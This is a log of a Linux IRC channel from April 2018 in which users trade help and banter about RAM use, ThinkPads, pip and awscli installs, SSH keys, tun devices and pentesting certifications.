16GB, but not as common as the 8GB. 21:05 < revel> I have 8GB, yes. 21:06 < kazdax> do i use virtual box instead of virt-mananger with kvm 21:06 < koala_man> ram is love, ram is life 21:06 < collins> ssh-keygen. Saved to id_rsa (default). Is that replacing any old keys? 21:06 < Psi-Jack> So, yes. I'd say 1GB for a DE is pretty reasonable, and quite functional, as my own desktop, up until just recently, had only 8GB. 21:06 < dgurney> yeh, 8GB is basically the modern minimum recommended amount 21:06 < uvvwvwwuuwv> no 1gb for a DE is not reasonable at all 21:06 < uvvwvwwuuwv> yall are insane 21:06 < dgurney> yes, it is 21:06 < uvvwvwwuuwv> nope 21:06 < uvvwvwwuuwv> it's not 21:06 < dgurney> get your head out of the 90s :P 21:06 < Psi-Jack> ^ 21:06 < revel> Just to display a static image and a movable cursor? 21:06 < dgurney> and this is coming from someone who uses i3wm on everything 21:07 < uvvwvwwuuwv> get your head out of dram manufacturers ass 21:07 < triceratux> woo woo new trisquel 8.0 [ 0.000000] Linux version 4.4.0-119-generic (pbuilder@devel.trisquel.info) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143+8.0trisquel2 SMP Thu Apr 5 16:24:48 UTC 2018 (Ubuntu 4.4.0-119.143+8.0trisquel2-generic 4.4.114-gnu) 21:07 < ShalokShalom> i use 260 here on plasma 21:07 < Psi-Jack> revel: But it's not just displaying a static image and a movable cursor. 21:07 * triceratux is free 21:07 < Snump> Remember RAMBUS? 21:07 < revel> triceratux: Free? I'll take ten! 21:07 < dgurney> well that's just rude 21:07 < ayecee> guys, guys! let's not get hostile here! be assured that you're _both_ wrong. 21:07 < ShalokShalom> plus, a DE often loads librarys for other applications as well 21:08 < ShalokShalom> use a WM and you have to load those anyway 21:08 < ShalokShalom> under the line, its the same 21:08 < koala_man> the cure for ram usage nostalgia is using 20 year old software for a day 21:08 < Psi-Jack> DE's tend to load a lot of shared libraries that gets utilized with other apps of the same DE. 21:08 < uvvwvwwuuwv> one billion bytes 21:08 < Frith> koala_man: You mean like awk and sed? ;) 21:08 < uvvwvwwuuwv> to automount usb drives 21:08 < prussian> Frith: exactly 21:08 < revel> lol 21:08 < uvvwvwwuuwv> and whatever else it does 21:09 < koala_man> Frith: yes, before utf-8 support and in-place editing 21:09 < Psi-Jack> ShalokShalom: Good comparison. :) 21:09 < Psi-Jack> My XFCE4+i3, uses about... 1GB RAM initially brought up. 21:10 < AE-35> what laptop compares to macbook air in terms of weight and hardware is supported on *nix os. 21:10 < Psi-Jack> AE-35: ##hardware 21:10 < dgurney> AE-35, many ultrabooks, but yes, ##hardware 21:10 < garylabronz> is there anything lighter than xfce+i3wm? (thats what i run).. and second question my powermanagement is broken because i never set it up properly.. im running thinkpads, is there a wiki/doc/reading? 21:10 < ntd> AE-35, thinkpad t-series are the bomb. carbon lacks wired nic 21:11 < AE-35> thanks 21:11 < Psi-Jack> Hmmm, bombs for laptops? Sounds..... explosive. 21:11 < dgurney> garylabronz, I'm sure something like dwm would be lighter 21:12 < Tahlwyn> yooo. I will never not vouch for T series thinkpad 21:12 < Psi-Jack> garylabronz: That depends on a lot, actually. Do you primarily run GTK+/Gnome apps, or Qt/KDE apps? 21:12 < dgurney> big X-series fan here 21:12 < Tahlwyn> typing on a t430s right now 21:12 < ntd> "all work day" battery life, matte touch-capable displays, webcam shutter etc etc 21:12 < garylabronz> im more looking at changing xfce than i3wm but ill take a look 21:12 < garylabronz> Psi-Jack: i run a shit ton of st terminals and Firefox 99% of the time 21:12 < ntd> linux support is stellar, fw updates for 5+ years 21:12 < Psi-Jack> garylabronz: Course you could always remove the XFCE part of it. :) 21:13 < Tahlwyn> $200, 128gb ssd, 12gb ram, really decent processor. functional fingerpring scanner, ultrabay, webcam although i dont use it 21:13 < Psi-Jack> garylabronz: Kindly mind the language, please. 21:13 < ntd> hell, they're pushing bios updates to t60 and x200 21:13 < garylabronz> heard 21:13 < koala_man> to update the bios rootkit? 21:13 < ntd> supposedly they've used them to remove it :) 21:14 < revel> garylabronz: Using tmux instead of having a bunch of st terminals up may be lighter on memory. 21:14 < Tahlwyn> <3 tmux 21:14 < ntd> not that the known efi rootkit was present in business models 21:14 < garylabronz> yeah i am straight into tmux on st start, so i have that covered. ram usage is actlly fine, just wondering/interested in lighter 21:14 < ntd> dell's was, though 21:14 < ntd> neither affect #linux anyway 21:15 < Frith> I like tmux. Not enough to move from screen, but I like it. 21:15 < Psi-Jack> koala_man: heh 21:15 < Psi-Jack> koala_man: I'm guessing people didn't catch that. :) 21:16 < Frith> I did use it to script my son's minecraft server so I could build a bunch of mazes and stuff. 21:16 < Psi-Jack> Ugh. minecraft. 21:17 < prussian> what does a terminal have to do with scripting minecraft? 21:17 < dgurney> I find Minecraft quite enjoyable when bored 21:17 < dgurney> more specifically, building subway networks in it 21:18 < Psi-Jack> Minecraft... The core reason Marai was even invented. 21:18 < Frith> prussian: at the time, aout 2 years ago, the only reasonable way I could construct things automatically was either to figure out what insane bunch of modules to add, or to use the server console to make blocks in different locations. 21:18 < Sitri> prussian: I'm guessing he makes something generate commands that will be input into the server console which will generate custom structures 21:19 < Frith> Sitri: Exactly. 21:19 < Sitri> When was the block placing command added BTW? 21:19 < dgurney> quite a while ago I think 21:19 < Frith> I honestly can't recall at the moment -- I want to say this was 4 years ago, but I could be wrong. 21:19 < Sitri> 1.8? I still run 1.6 modded stuff. 21:20 < prussian> I see 21:20 < Frith> I think I was running one of the 1.8 versions. 21:20 < Frith> That sounds reasonably familiar. 21:20 < Sitri> I do know there's that lua-integrated server though 21:21 < Frith> There were a couple, but at the time, each set of modules came with it's own bunch of unstable crap that could work sort of if you installed the right sequence of dance moves. 21:25 < Alex223> Hello. Using gcc 8.0.1 I am encountering an error when using -flto flag "ltol: fatal error: bytecode stream generated with LTO version 7.0 instead of expected 5.2" 21:26 < Alex223> Anyone who may have a clue on why this happens? Thanks 21:26 < revel> GCC 8 hasn't been officially released yet, has it? 21:26 < revel> Asking on a GCC-specific channel may help more. 21:26 < garylabronz> any links to thinkpad powermanagement for laptops? id like my machine to hibernate when lid closes.. i have an x1 gen1 and an x230 21:27 < Alex223> @revel Do you know of any gcc channels? Thanks 21:27 < jim> debian unstable has gcc-7.3.0 21:27 < revel> Not sure. 21:28 < jim> Alex223, there is a bot, alis, that can assist you in looking for channels on the Freenode irc net. To start, /msg alis help 21:28 < revel> Also, according to https://gcc.gnu.org/ , the latest release is 7.3 21:28 < revel> So, 8.0.1 is prerelease, so that might just get ironed out by the full release. 21:33 < starseed00> When I apt-get awscli package it is really outdated, how would I go about fixing this? 21:40 < jim> starseed00, you could try getting debianized sources for the package, and build it and install the resulting package(s)... and, you can see if a backport exists 21:40 < jim> one question, do you need the newer features? 21:41 < starseed00> jim: Yeah, I am getting all sort of errors trying to use the old one :/ 21:42 < jim> what dist are you running? 21:42 < Lope> Frith: If you really want to know about the effect of EMF (wifi and mobile phone signals) on health and the current health warnings by WHO and many scientists, surgeons and researchers, here are some interesting links: https://hastebin.com/oginajodac.pas 21:43 < jim> starseed00, what dist are you running? 21:43 < starseed00> jim: Amazon Linux 21:43 < revel> And it's outdated on that? That doesn't sound right... 21:44 < jim> and it's a debian deriv? 21:44 < revel> starseed00: You did `apt update` first, right? 21:44 < dgurney> hang on a second... outdated amazon program... on an amazon distro??? 21:44 < jim> I don't know much about that... do you have nm installed? 21:44 < starseed00> jim: Centos 21:44 < starseed00> revel: Yes I did 21:45 < starseed00> dgurney: The os is amazon, I still get the package with apt get 21:46 < starseed00> You would think they would have the correct repos though - they seem pretty set on installing the tool with python though, which is a path I am trying to avoid since I can't figure out why my python hasn't got pip 21:47 < jim> starseed00, hmm, you could ask in #python how to get pip 21:47 < starseed00> jim: Might be I end up doing that! Thanks all. 21:47 < mawk> some distros package pip separately from python 21:48 < starseed00> mawk: That's good to know 21:48 < jim> and, you should not be running pip as root :) instead, you should make a virtual env and use its copy of pip 21:49 < starseed00> Good to know 21:49 < uplime> easy_install pip 21:49 < jim> yeah, pip can screw things up pretty good for dists with package management 21:50 < jim> starseed00, and, if you don't have a way to make virtual envs, you can ask about that on #python as well 21:50 < starseed00> It would be nice if I could just use the package manager, it just doesn't make sense to me 21:51 < starseed00> jim: Ok 21:52 * oehansen I love my, I love my, I love my ... hackintosh 21:55 < qoxncyha> oehansen: what hardware do you use? 22:00 < kazdax> hmm i am having problems with virtual box 22:00 < kazdax> removed it and reinstalling it 22:00 < kazdax> see if it fixes the problem 22:01 < Psilocyber> is there a table somewhere that shows kernel version that shipped with distro versions 22:02 < ayecee> not that i've heard of 22:03 < nszceta> what's a good IRC channel for business related discussion 22:03 < ayecee> ##chat 22:03 < z88> Maybe phoronix. 22:03 < z88> Psilocyber: https://openbenchmarking.org/embed.php?i=1803147-FO-LINUXOS0724&sha=24e6465&p=2 22:04 < okra> ##c for sure 22:04 < triceratux> Psilocyber: if you cant dig it out of distrowatch just boot the liveisos yourself & tabulate the results of uname -a 22:05 < Psilocyber> triceratux: the former sounds good, the latter sounds like a stupid amount of work :/, I didn't think of distrowatch ill try this 22:05 < z88> https://www.phoronix.com/scan.php?page=article&item=11-linux-boot&num=1 22:05 < z88> Not the distros by kernel per se, but they test different distros and the kernel is one of the control parameters. 22:06 < triceratux> Psilocyber: i wind up doing it myself anyway. its worth the attention https://paste.opensuse.org/view/raw/87508524 22:06 < Psi-Jack> Oi.. this sucks. Have one of my VM servers constantly locking up under load. Sometimes it'll get stonith'd (technically by itself), sometimes not. And it seems every time it's related to network interface. 22:07 < Psi-Jack> Annnnnd, it's a realcrap 8168. Part of the problem. heh 22:07 < ayecee> heisenbugs :( 22:07 < triceratux> https://www.linuxuprising.com/2018/04/gksu-removed-from-ubuntu-heres.html 22:07 < phre4k> I use awesomewm and GTK3 applications have no spacing between menu items, how do I fix this? 22:07 < Psi-Jack> Yeah, heisenbugs for sure. 22:07 < angelo_ts> hello, anyone knows how i can receive again a lost mail from majordomo mailing list ? 22:07 < Psi-Jack> now if I could juuuuust get my wife's attention to push the reset button on it..... 22:08 < Psi-Jack> angelo_ts: /the/ majordomo majordomo mailing list? 22:08 < angelo_ts> majordomo-based 22:09 < Psi-Jack> majordomo is software, so, your question currently makes little sense. Can you please clarify what you're talking about, and is this majordomo something you yourself run, or just subscribe to? 22:14 < juliangallego86> Test 22:14 < Co0lBeanzz> Anyone use the linux-steam-integration snap from solus for gaming? How's its performance compared to the normal steam? 22:14 < phre4k> juliangallego86: your message is received. 22:15 < juliangallego86> Thanks 22:25 < Loshki> angelo_ts: if the list is archived, that's your answer. Failing that, you may have to beg someone on the list to forward you a copy 22:27 < collins> Got a pub and priv id_rsa. Which one is the "host key"? 22:28 < Dagmar> None are 22:29 < fendur> the private key is the one you don't want anyone else to touch/see 22:29 < Dagmar> The "host key" comes from _other hosts_ and it'll be cached in ~/.ssh/known_hosts 22:29 < Dagmar> _Like it says when it complains about the host key being changed_ 22:29 < fendur> ah. i didn't get it. :) 22:30 < collins> hm. thanks :) 22:30 < Dagmar> Co0lBeanzz: If you have the option to use the binaries from Steam, use them 22:31 < Co0lBeanzz> Dagmar: Why? 22:31 < Dagmar> Co0lBeanzz: because no random numbnutzes are going to be able to write a Steam client of their own. All they're doing is repackaging the binaries they got from Steam. Cut out hte middle man 22:33 < kazdax> <kazdax> i figured out why my virtual machine were slow 22:33 < kazdax> <kazdax> because i dint enable Virtualization in bios 22:33 < Co0lBeanzz> Dagmar: Fair. I'm just trying to get as much performance as possible 22:33 < Dagmar> Then use the binaries Steam provides 22:33 < Dagmar> Follow their instructions. 22:37 < mr-rich> I would like a recommendation for a linux laptop with a docking station that is 100% compatible. Time to ditch this old desktop ... 22:37 < Co0lBeanzz> Will do. Thanks 22:41 < Psi-Jack> mr-rich: ##hardware 22:42 < fendur> compatibility seems relevant. 22:43 < Psi-Jack> The people in ##hardware are familiar with linux. 22:43 < ayecee> hey, me too! 22:44 < fendur> ayecee: maybe you should go to ##hardware! 22:44 < phre4k> mr-rich: Thinkpad T series, but yes, join ##hardware 22:44 < xamithan> Why do people say "linux laptop" ? Is that a thing ? 22:44 < ayecee> same reason they say "economy car" 22:45 < Psi-Jack> Heh, good analogy, ayecee. 22:45 < mr-rich> as opposed to a Windows Laptop ... ? 22:45 < xamithan> I've never heard that before, economy car 22:45 < Psi-Jack> mr-rich: No such thing. :) 22:45 < oerheks> linux laptop is just a qualification that all hardware works OOTB 22:45 < fendur> xamithan: not American? 22:45 < xamithan> I'm american 22:45 < fendur> are you youth? 22:45 < ayecee> o_O 22:45 < xamithan> What is the range for a youth 22:46 < xamithan> I've heard of hybrid cars, and electric cars 22:46 < ayecee> do you still get carded when you buy alcohol 22:46 < mr-rich> Psi-Jack: in a perfect world ... but this world ain't perfect ... 22:46 < Psi-Jack> xamithan: Quite common actually. When I went to Texas for a funeral, I ordered a rental car as well, "economy car", course, when I got there, they pointed me to this extended-cab pickup truck, because, Texas. 22:46 < xamithan> Yes I get carded for the past 14 years 22:46 < ayecee> mmkay 22:46 < Psi-Jack> mr-rich: No, it's not. System76 (not recommended by me, they are fireballs), and Dell makes "Linux laptops", that is, Linux comes pre-installed on them. 22:47 < xamithan> One bouncer even snapped my ID in half 22:47 < Psi-Jack> mr-rich: But any laptop is "Linux compatible" to do with as you see fit. 22:47 < phre4k> Psi-Jack: "any"… bold statement 22:48 < Psi-Jack> Yes, any. 22:48 < phre4k> sure, you can write your own drivers for proprietary stuff 22:48 < ayecee> let's see how it plays out for him 22:48 < mr-rich> Psi-Jack: allow me to rephrase ... I would like a laptop & docking station that is 100% compatible ... 22:48 < Psi-Jack> mr-rich: Any laptop. 22:48 < phre4k> mr-rich: I already gave you an example and a few people told you to join ##hardware 22:48 < xamithan> system76 is just rebranded cevos 22:48 < phre4k> mr-rich: so join the said channel 22:48 < xamithan> *clevos rather 22:48 < Psi-Jack> mr-rich: Just avoid the hybrid video ones, with Intel/Nvidia or Intel/AMD 22:49 < xamithan> hybrid video is fine too 22:49 < Psi-Jack> If you want more problems. :) 22:49 < xamithan> at least nvidia does prime very good 22:49 < mr-rich> phre4k: I have a T-450 for work ... I've heard there are issues with docking & undocking ... 22:49 < phre4k> mr-rich: you heard? 22:49 < fendur> fwiw, I just got the cheapest laptop I could find and everything works fine in linux. 22:49 < phre4k> lol. 22:49 < qman> there are always issues with docking and undocking, regardless of operating system 22:50 < uplime> mr-rich: no software/hardware is perfect 22:50 < xamithan> I agree with qman, I think the issues exist no matter the OS you use 22:50 < kazdax> are there any other exams like RCHSA and RHCE that require you to prove you know how to do things than awsner multiple choice questions ? 22:50 < xamithan> Sure kazdax, there is lots of other redhat exams 22:50 < Psi-Jack> kazdax: Amazon's AWS certs are question & multiple choice, but thorough and detailed still. 22:51 < Psi-Jack> But, with AWS you practically have to unlearn everything you know, and remold it and pocket it. ;) 22:51 < kazdax> i mean besides redhat certs which test your practical knowledge not book knowledge 22:51 < qman> that's like asking for a system where sleep and wake always work perfectly - it's never happened in the history of computers 22:51 < phre4k> kazdax: yes 22:51 < mr-rich> uptime: true, that, but I have 2 docking stations for my T-450. One with 2 monitors, the one at work has 3 ... the trick I use is to put the laptop to sleep before I undock (windows) and I haven't had many issues re-docking ... 22:52 < kazdax> phreak could you enlighten me on the ones that exist 22:52 < phre4k> kazdax: yes 22:52 < xamithan> I think the OSCP is practical 22:52 < Psi-Jack> mr-rich: I had a Dell one time, that I used to have docking stations for, at home and work. Worked quite well, actually. 22:52 < kazdax> i mean i want to work with technology as a way to make money and enjoy myself but i dont want to invest in trying to pove my bookworm skills 22:53 < mr-rich> Psi-Jack: It ran gnu/linux? 22:53 < Psi-Jack> mr-rich: I don't run anything but GNU/Linux. 22:53 < xamithan> I've heard the OSCP is quite hard though 22:53 < qman> I have a thinkpad x220 and highly recommend it, though I do not have a docking station for it 22:54 < kazdax> ohh nice 22:54 < mr-rich> Psi-Jack: I wish I could talk my company into issuing me a linux installed laptop ... then I would be all linux myself ... :( 22:54 < kazdax> pen testing with kali sounds like fun 22:54 < xamithan> kazdax: It is a 24-hour exam :P 22:54 < kazdax> no breaks "? 22:54 < kazdax> but its pen testing what could be boring about it right ? 22:54 < Psi-Jack> mr-rich: I refuse to work for any company that requires me to run Windows. 22:55 < Psi-Jack> I'll accept macOS, but not anything other than Linux or macOS. 22:55 < qman> my employer offers windows and mac 22:55 < qman> and I refuse to use mac 22:55 < phre4k> kazdax: do you do pentesting? because actual pentesting work is fucking boring 22:55 < uplime> <3 macos 22:55 < Psi-Jack> qman: macOS is soooooo much better than Windows. 22:55 < kazdax> phre4k i ahve done some malware reversing 22:55 < qman> yeah, no 22:55 < kazdax> that was what i consider boring 22:56 < uplime> its still unix, and unix is great 22:56 < uplime> besides the whole POSIX thing :/ 22:56 < kazdax> dont know much about pen testing 22:56 < kazdax> but i think i understand where it could get boring 22:56 < kazdax> like checking for security flaws in software ..could become a boring task 22:56 < phre4k> kazdax: reports, reports, reports, reports, reports 22:56 < phre4k> oh, and reports 22:56 < kazdax> yea 22:56 < kazdax> i understand that 22:56 < xamithan> It is like doing QA work 22:57 < phre4k> xamithan: only with more reports 22:57 < xamithan> Yes 22:57 < phre4k> :'D 22:57 < kazdax> exacept for offensive security 22:57 < kazdax> i dont think there is any useless books on the topic are they 22:57 < kazdax> i seen open testing books on ethical hacking 22:57 < phre4k> kazdax: what do you think offensive security is? 22:57 < kazdax> and they seem like baby stuff 22:57 < kazdax> like how to use tools and stuff like that 22:58 < Psi-Jack> kazdax: Well, pen testing is very messy, with all that ink and stuff. :) 22:58 < kazdax> a real pen tester would find new flaws 22:58 < phre4k> kazdax: not necessarily 22:58 < ayecee> pretty rarely 22:59 < ayecee> that's more of a security research thing 22:59 < phre4k> ^ 22:59 < phre4k> kazdax: I think xamithan put it quite well, it's similar to QA work 22:59 < xamithan> I think of it exactly like PCI compliance work, just a bit more detailed and hands on 23:00 < xamithan> Boring to me but maybe some people like that 23:00 < kazdax> maybe i should just stick with this RHCSA and RHCE 23:00 < kazdax> and then see if i have the time and ability to pursue Offesnive security 23:01 < kazdax> but dont they need NSA clearence for most jobs ? 23:01 < phre4k> kazdax: yes. One at a time. RHCSA is great. 23:01 < phre4k> you don't need _ANY_ cert to work as a Linux guy though 23:01 < xamithan> what is "NSA clearance" ? 23:01 < kazdax> i heard you need NSA clearence for some jobs to show that you can keep confidential things under wrap or something like that 23:01 < kazdax> i am not sure 23:01 < Sveta> xamithan: a document from government which confirms that the person has not done anything wrong 23:02 < kazdax> ahh 23:02 < phre4k> kazdax: unless you work for the NSA you don't need anything from them 23:02 < cineribus> LPIC is pretty good, but I don't know how it compares to RHCSA. Anyone with both know? 23:02 < xamithan> I've never heard of that, you might need a secret clearance or top secret clearance for more secure work 23:02 < Sveta> xamithan: actually I may be wrong... 23:02 < Sveta> xamithan: https://en.wikipedia.org/wiki/Security_clearance 23:02 < kazdax> LPIC wants you to know all sort of book stuff 23:02 < phre4k> kazdax: actually, in nearly all jobs you don't want to have anything to do with the NSA or any other 3 letter agency 23:02 < xamithan> Which is a background check and security+ or cissp cert 23:02 < kazdax> yea i know how they can fuck you over 23:02 < Sveta> xamithan: (such background check is the first step, but the NSA clearance also involves allowing people to access secret information) 23:03 < Sveta> kazdax: as foreigners are present in the channel, obscene language has been discouraged 23:03 < kazdax> heard about the CIA and NSA doing bad to thier own people for the good of so called country 23:03 < kazdax> ill take note sveta 23:03 < Sveta> cool 23:03 < fendur> the country is real, it's "good" that is "so called" 23:04 < Psilocyber> once an organization gets to a certain size, its only interest is self preservation 23:04 < Sveta> I'm personally not excited about doing secret things which involve programming, as this may involve creation of backdoors 23:04 < Psilocyber> no such 'good of the country', thats the lie they mask it with 23:04 * Sveta joins ##security 23:05 < kazdax> for now ill keep my quiestions towasrds linux 23:05 < kazdax> because thats what this room is about 23:05 < kazdax> wish me luck on my RCHSA 23:05 < kazdax> and i hope to get it soon 23:05 < Sveta> break a leg or something :-) (it means good luck) 23:05 < kazdax> excited to see what a Server and workstation can be used for 23:05 < kazdax> thanks :D 23:05 < xamithan> Don't need luck, need about 2-4 weeks of labbing 23:06 < Sveta> I wish you 2-4 weeks of labbing, kazdax :) 23:06 < kazdax> yea i am setting up my lab under kvm as we speak 23:06 < kazdax> thank you :D 23:06 < phre4k> kazdax: install Fedora first 23:06 < kazdax> phre4k i have debian running as host 23:06 * Sveta eats phre4k and phre4k's fedora 23:07 < phre4k> kazdax: install Fedora then 23:07 < kazdax> my vms are going to be RHEL 23:07 < phre4k> oh, and install it on your homeserver, too 23:07 < phre4k> hm, will they now 23:07 < kazdax> why fedora phre4k ? 23:12 < collins> I can't relate. I see what the manpage of ssh-agent says, but what does "ssh-add" do? 23:12 < kazdax> phre4k are you hacking my system ? 23:12 < collins> what is ssh-agent doing? 23:13 < collins> is it basically a keyring? 23:15 < Dagmar> It's basically a keyring agent 23:15 < collins> hm. I feel that I need not to bother with it right now then. It's just a convenience then. 23:16 < collins> github think that you should add it to the ssh-agent. Is that necessary? 23:17 < Dagmar> That depends on how often you like typing your ssh key passphrase 23:18 < lnslbrty> Anyone has used epoll_pwait in conjunction with signalfd? Unfortunately it doesn't work like expected. 23:18 < vlt> Hello. On a Debian 8 machine as xen dom0 I used `xl save ` to freeze a domU. The save process wrote the initial config file value for "memory = 8000" to the save file even though I had increased the memory size to something like 20000. The size of the .save file is 19464411855. 23:18 < vlt> Any idea how to restore that? 23:22 < phre4k> kazdax: why would I do that 23:23 < collins> Dagmar: :3 typing the same 20 char passwords 20 times over again pures the soul 23:30 < ayecee> gives you time to think 23:30 < RayTracer> "what was the next char again" 23:33 < ayecee> "what am i doing with my life" 23:34 < nszceta> ##chat 23:35 < Aph3x-WL> "how long can i go without bathing before someone says something" 23:38 < twainwek> depends on where you live 23:40 < Bunk> ♠ haha ♠ 23:41 < mawk> why do I need to be root to make a tun device ? 23:41 < mawk> /dev/net/tun has write rights for everyone 23:41 < collins> mawk: only root may make device files 23:43 < Dagmar> mawk: The usual role of it being the kernel's job to broker access to any/all hardware 23:43 < Dagmar> So, if you want to do *anything* to hardware, you've got to be root or have permissions explicitly granted previously 23:44 < Dagmar> As far as the kernel is concerned, virtual devices count as hardawre 23:44 < uplime> collins: device files being the thing in /dev ? 23:45 < Dagmar> Yep 23:45 < uplime> thanks collins 23:46 < mawk> yeah but the device is already here 23:46 < mawk> /dev/net/tun 23:47 < mawk> it's already created, it's a character mode device 23:47 < mawk> but apparently the tun file code checks capabilities before creating the device 23:48 < arooni> so apparently my old decrepit router couldn't understand the type of ext4 file system that ubuntu 16.04 formatted... so it required me to reformat via its version of ext4 mkfs ... q 1) how common is it that linux devices cant understand other ext4 versions 2) what kinds of features would i be losing from using an older ext4 version 23:48 < arooni> (reformant a usb hard drive) 23:52 < aBound> Howdy do, doo... :P 23:52 < snugger> Hey there aBound 23:52 < collins> mawk: something that requires root access is required when you're doing the thing you're trying to do 23:52 < mawk> it's not immediately obvious 23:53 < mawk> the kernel drive could allow anyone having write access to the tun file 23:54 < collins> even malware? 23:55 < collins> I don't know what the actual issue is though, but it's possible that you're trying to write to a read-only/locked file or something too. 23:56 < mawk> I was trying to create a tun interface as my normal user 23:56 < mawk> but I created the interface as root and set my user as the owner 23:56 < mawk> sudo ip tuntap add name tun42 mode tun group netdev 23:57 < wtflux> hi ##linux, i've booted into parted magic and im trying to load some old HFS (mac) floppy diskettes 3.5" and i cant get mount -t /dev/fd0(1,...) to mount on /mnt/floppy 23:57 < wtflux> im currently on parted magic 3.5.6 23:58 < wtflux> does anyone have any suggestions how i can get this working? --- Log closed Fri Apr 20 00:00:51 2018